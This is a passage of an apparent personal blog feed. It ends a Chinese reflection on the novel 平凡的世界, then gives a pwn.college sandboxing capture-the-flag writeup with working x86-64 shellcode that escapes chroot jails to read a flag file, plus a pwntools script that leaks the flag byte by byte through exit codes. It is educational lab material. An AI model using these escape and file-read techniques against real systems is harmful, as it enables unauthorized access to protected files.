哥一起开砖厂，但是我懂得社会需要像少平这样的理想主义者，他们对身边的人和事有更深刻的思考，他们的高尚的精神容不得玷污。</p><p>书中的人物还有很多，政治上的刘根民、周文龙、田福军、苗凯、乔伯年、冯世宽、高凤阁，张有智，双水村的福堂、玉亭、俊文、俊武、海民、福高、王彩娥，原西县高中的顾养民、金波等，大亚湾煤矿上的安锁子、王世才夫妇。正是这些人物和几个主角之间发生的故事，构成了整本书的全部内容。和看完其他书籍不同的是，阅读完这本书时，我更多的是一种平静，一种对于生活中发生的各种事情的平静。尤其电视剧的结局带来了一种幸福的平静，福堂接受了润生和郝红梅的爱情，他带着红梅前夫的孩子和自己的孙女，向前安上了假肢骑自行车带着润叶和乐乐一起回家过年。玉厚家更是热闹，兰香带来了自己的男朋友，兰花的丈夫王满银也不满世界跑了，安安稳稳地在少安的砖厂里当起了伙夫，少平和少安用拉车拉着挂着点滴的秀莲，秀莲差点睡着，还好又醒了。双水村的天空上，满是过年放得烟花。<strong>苦，笑，都是因为欢乐。哭的人知道而笑的人并不知道，这欢乐是多少痛苦所换来的。</strong> <strong>是啊，虽然我们都生活在平凡的世界里，但我们不屈的意志和努力奋斗的精神会让生活变得越来越好，即便有暂时的艰难和苦难折磨人的心神，可只要我们不被这些苦难打倒，就一定能等来属于自己的充满幸福的生活！</strong></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;平凡的世界读后感&quot;&gt;&lt;a href=&quot;#平凡的世界读后感&quot; class=&quot;headerlink&quot; title=&quot;平凡的世界读后感&quot;&gt;&lt;/a&gt;平凡的世界读后感&lt;/h1&gt;&lt;p&gt;其实我昨天就已经读完了。之所以拖到今天，是想着顺便把电视剧给看完。书中讲述的故事和这本书的题</summary>
      
    
    
    
    <category term="读书" scheme="https://laobameishijia.github.io/category/%E8%AF%BB%E4%B9%A6/"/>
    
    
    <category term="平凡的世界" scheme="https://laobameishijia.github.io/tag/%E5%B9%B3%E5%87%A1%E7%9A%84%E4%B8%96%E7%95%8C/"/>
    
  </entry>
  
  <entry>
    <title>PWN-College-SandBox-Writeup</title>
    <link href="https://laobameishijia.github.io/2024/09/14/pwn-college-sandbox-writeup/"/>
    <id>https://laobameishijia.github.io/2024/09/14/pwn-college-sandbox-writeup/</id>
    <published>2024-09-14T10:46:00.000Z</published>
    <updated>2025-04-30T08:50:54.037Z</updated>
    
    <content type="html"><![CDATA[<h1 id="pwn-college"><a href="#pwn-college" class="headerlink" title="pwn.college"></a>pwn.college</h1><p><a href="https://pwn.college/system-security/sandboxing/">https://pwn.college/system-security/sandboxing/</a></p><h2 id="有价值的问题"><a href="#有价值的问题" class="headerlink" title="有价值的问题"></a>有价值的问题</h2><h3 id="1-chroot-amp-chdir"><a href="#1-chroot-amp-chdir" class="headerlink" title="1. chroot &amp; chdir"></a>1. chroot &amp; chdir</h3><ul><li>chroot</li><li>sets the kernel’s concept of <strong>the root directory</strong> of your process</li><li>chdir</li><li>sets the kernel’s concept of <strong>the current working directory</strong> of your process</li></ul><h3 id=""><a href="#" class="headerlink" title=""></a></h3><h2 id="level-1"><a href="#level-1" class="headerlink" title="level 1"></a>level 1</h2><p>如果在根目录下面执行的话，直接<code>/challenge/babay flag</code>即可</p><p><code>chroot()</code> changes the meaning of <code>/</code> for a process and its children.</p><p><code>chroot(&quot;/tmp/jail&quot;)</code> has two effects:</p><ul><li>For this process, change the meaning of “/“ to mean “/tmp/jail”.<ul><li>and everything under that: “/flag” becomes “/tmp/jail/flag”</li></ul></li><li>For this process, change “/tmp/jail/..” to go to “tmp/jail”</li></ul><p><code>chroot(&quot;/tmp/jail&quot;)</code> does NOT:</p><ul><li>Close resources that reside outside of the jail.</li><li><code>cd(chdir())</code> into the jail.</li><li>Do anything else ！</li><li>Neither of the effects of <code>chroot</code> do anything to previously-open resources.</li><li>change hte current working directory</li></ul><h2 id="level-2"><a href="#level-2" class="headerlink" title="level 2"></a>level 2</h2><p><code>/challenge/babyjail_level2 ./test &lt; ./shellcode.bin</code></p><pre class="line-numbers language-asm" data-language="asm"><code class="language-asm">BITS 64section .data    filename db &#39;..&#x2F;..&#x2F;..&#x2F;..&#x2F;flag&#39;, 0    ; 文件路径需要替换为正确的路径section .bss    buffer resb 100                   ; 100 字节缓冲区section .textglobal _start_start:    ; open(&quot;filename&quot;, O_RDONLY)    xor rax, rax    mov rax, 2                        ; SYS_open    lea rdi, [rel filename]    xor rsi, rsi                      ; O_RDONLY &#x3D; 0    syscall    ; 检查 open 的返回值    test rax, rax    js error                          ; 如果打开文件失败，跳转到错误处理    ; read(fd, buffer, 100)    mov rdi, rax                      ; fd    lea rsi, [rel buffer]    mov rdx, 100                      ; 读取 100 字节    xor rax, rax                      ; SYS_read    syscall    ; write(1, buffer, rax)    mov rdi, 1                        ; stdout    mov rdx, rax                      ; 读取的字节数    mov rax, 1                        ; SYS_write    syscall    ; exit(0)    xor rdi, rdi                      ; 返回码 0    mov rax, 60                       ; SYS_exit    syscallerror:    ; exit(1)    mov rdi, 1                        ; 返回码 1    mov rax, 60                       ; SYS_exit    syscall<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><h2 id="level-3"><a href="#level-3" class="headerlink" title="level 3"></a>level 3</h2><p>注意<code>open</code>函数打开的，既有可能是一个文件，也有可能是一个目录。</p><p><code>/challenge/babyjail_level3 ./ &lt; ./shellcode.bin</code></p><pre class="line-numbers language-asm" data-language="asm"><code class="language-asm">BITS 64section .data    filename db &#39;..&#x2F;..&#x2F;..&#x2F;..&#x2F;flag&#39;, 0    ; 文件路径需要替换为正确的路径    errormessage db &#39;error&#39;, 0section .bss    buffer resb 100                   ; 100 字节缓冲区section .textglobal _start_start:    ; openat(3, filename, 0, 0)    xor rdi, rdi    xor rax, rax    xor r10, r10    mov rdi, 3    xor rdx, rdx    mov rax, 0x101                    ; SYS_openat    lea rsi, [rel filename]    syscall    ; 检查 open 的返回值    test rax, rax    js error                          ; 如果打开文件失败，跳转到错误处理    ; read(fd, buffer, 100)    mov rdi, rax                      ; fd    lea rsi, [rel buffer]    mov rdx, 100                      ; 读取 100 字节    xor rax, rax                      ; SYS_read    syscall    ; write(1, buffer, rax)    mov rdi, 1                        ; stdout    mov rdx, rax                      ; 读取的字节数    mov rax, 1                        ; SYS_write    syscall    ; exit(0)    xor rdi, rdi                      ; 返回码 0    mov rax, 60                       ; SYS_exit    syscallerror:    ; write(1, buffer, rax)    lea rsi, [rel errormessage]    mov rdi, 1                        ; stdout    mov rdx, rax                      ; 读取的字节数    mov rax, 1                        ; SYS_write    syscall    ; exit(1)    mov rdi, 1                        ; 返回码 1    mov rax, 60                       ; SYS_exit    syscall<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><h2 id="level-4"><a href="#level-4" class="headerlink" title="level 4"></a>level 4</h2><h2 id="level-5"><a href="#level-5" class="headerlink" title="level 5"></a>level 5</h2><h3 id="系统调用参数"><a href="#系统调用参数" class="headerlink" title="系统调用参数"></a>系统调用参数</h3><p><code>linkat</code>的函数原型是：</p><pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">int</span> <span class="token function">linkat</span><span class="token punctuation">(</span><span class="token keyword">int</span> olddirfd<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span>oldpath<span class="token punctuation">,</span> <span class="token keyword">int</span> newdirfd<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span>newpath<span class="token punctuation">,</span> <span class="token keyword">int</span> flags<span class="token punctuation">)</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><ul><li><code>olddirfd</code>: 指向旧目录文件描述符（可以是<code>AT_FDCWD</code>，表示当前工作目录）。</li><li><code>oldpath</code>: 指向要链接的源路径的指针。</li><li><code>newdirfd</code>: 指向新目录文件描述符（可以是<code>AT_FDCWD</code>，表示当前工作目录）。</li><li><code>newpath</code>: 指向目标路径的指针。</li><li><code>flags</code>: 链接时的标志。</li></ul><h2 id="level-6"><a href="#level-6" class="headerlink" title="level 6"></a>level 6</h2><p><code>fchdir</code>是一个系统调用，用于更改当前工作目录到由文件描述符指定的目录。与<code>chdir</code>不同，<code>fchdir</code>是通过一个打开的文件描述符进行操作，而不直接使用路径名。</p><h3 id="函数原型"><a href="#函数原型" class="headerlink" title="函数原型"></a>函数原型</h3><pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">int</span> <span class="token function">fchdir</span><span class="token punctuation">(</span><span class="token keyword">int</span> dirfd<span class="token punctuation">)</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><h3 id="参数"><a href="#参数" class="headerlink" title="参数"></a>参数</h3><ul><li><code>dirfd</code>: 指向要设置为当前工作目录的目录的文件描述符。这个文件描述符必须是一个有效的目录。如果使用<code>AT_FDCWD</code>作为参数，则表示使用当前工作目录。</li></ul><h3 id="返回值"><a href="#返回值" class="headerlink" title="返回值"></a>返回值</h3><ul><li>如果成功，返回<code>0</code>。</li><li>如果失败，返回<code>-1</code>，并将<code>errno</code>设置为表示错误的代码。</li></ul><h2 id="level-7"><a href="#level-7" class="headerlink" title="level 7"></a>level 7</h2><p>有些人白痴到把<code>lea rdi, [rel filename]</code> 写成了 <code>mov rdi, [rel filename]</code></p><h3 id="1-lea-rdi-rel-dirname"><a href="#1-lea-rdi-rel-dirname" class="headerlink" title="1. lea rdi, [rel dirname]"></a>1. <code>lea rdi, [rel dirname]</code></h3><ul><li><strong>功能</strong>：<code>lea</code>（Load Effective Address）指令用于加载一个地址（而不是指向该地址的内容）到寄存器中。具体来说，它计算 <code>dirname</code> 的地址，并将这个地址存储到 <code>rdi</code> 中。</li><li><strong>用途</strong>：当你需要将一个变量或字符串的地址传递给系统调用或其他指令时，<code>lea</code> 是正确的选择。它不会尝试去访问或读取 <code>dirname</code> 变量的内容，而是将它的地址直接放到 <code>rdi</code> 中。</li></ul><h3 id="2-mov-rdi-rel-dirname"><a href="#2-mov-rdi-rel-dirname" class="headerlink" title="2. mov rdi, [rel dirname]"></a>2. <code>mov rdi, [rel dirname]</code></h3><ul><li><strong>功能</strong>：<code>mov</code> 指令用于将某个内存地址中的内容加载到寄存器中。在这种情况下，<code>[rel dirname]</code> 被解释为从 <code>dirname</code> 的内存地址读取内容，并将这个内容放入 <code>rdi</code> 中。</li><li><strong>用途</strong>：这种用法会尝试访问 <code>dirname</code> 所指向的内存位置，并将该位置的内容（通常是字符串的首字符的 ASCII 值）放入 <code>rdi</code> 中。这通常不是我们想要的，因为在创建目录时，我们需要传递的是目录的地址，而不是其内容。</li></ul><h2 id="level-8"><a href="#level-8" class="headerlink" title="level 8"></a>level 8</h2><p><code>/challenge/babyjail_level8  &lt; shellcode.bin 3&lt;/</code></p><h2 id="level-9"><a href="#level-9" class="headerlink" title="level 9"></a>level 9</h2><p>又犯了第7关的错误</p><p>要注意下x86-64和x86-32两种架构下，系统调用号是不一样的。</p><pre class="line-numbers language-asm" data-language="asm"><code class="language-asm">32位：mov eax, 3    ---(read)int 0x8064位：mov rax, 3   -----(close)syscall<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><h2 id="level-10"><a href="#level-10" class="headerlink" title="level 10"></a>level 10</h2><p>学习一下这种编程思路。替换掉TEST的占位，换成响应的地址，然后再汇编。</p><pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>flag <span class="token operator">=</span> <span class="token string">""</span><span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">57</span><span class="token punctuation">)</span><span class="token punctuation">:</span>    p <span class="token operator">=</span> process<span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token string">"/challenge/babyjail_level10"</span><span class="token punctuation">,</span> <span class="token string">"/flag"</span><span class="token punctuation">]</span><span class="token punctuation">)</span>    shellcode <span class="token operator">=</span> <span class="token triple-quoted-string string">"""        mov rdi, 3        mov rsi, 0x1337100        mov rdx, 100        mov rax, 0        syscall        mov rax, 0x3c        mov rdi, [TEST]        syscall"""</span>    <span class="token comment"># 替换占位符</span>    shellcode <span class="token operator">=</span> shellcode<span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">"TEST"</span><span class="token punctuation">,</span> <span class="token builtin">hex</span><span class="token punctuation">(</span><span class="token number">0x1337100</span> <span class="token operator">+</span> i<span class="token punctuation">)</span><span class="token punctuation">)</span>    shellcode <span class="token operator">=</span> asm<span class="token punctuation">(</span>shellcode<span class="token punctuation">,</span> arch<span class="token operator">=</span><span class="token string">'amd64'</span><span class="token punctuation">)</span>    p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>shellcode<span class="token punctuation">)</span>    p<span class="token punctuation">.</span>wait<span class="token punctuation">(</span><span class="token punctuation">)</span>    flag <span class="token operator">+=</span> <span class="token builtin">chr</span><span class="token punctuation">(</span>p<span class="token punctuation">.</span>returncode<span class="token punctuation">)</span><span class="token keyword">print</span><span class="token punctuation">(</span>flag<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;pwn-college&quot;&gt;&lt;a href=&quot;#pwn-college&quot; class=&quot;headerlink&quot; title=&quot;pwn.college&quot;&gt;&lt;/a&gt;pwn.college&lt;/h1&gt;&lt;p&gt;&lt;a href=&quot;https://pwn.college/syste</summary>
      
    
    
    
    <category term="CTF" scheme="https://laobameishijia.github.io/category/CTF/"/>
    
    
    <category term="Web" scheme="https://laobameishijia.github.io/tag/Web/"/>
    
  </entry>
  
</feed>
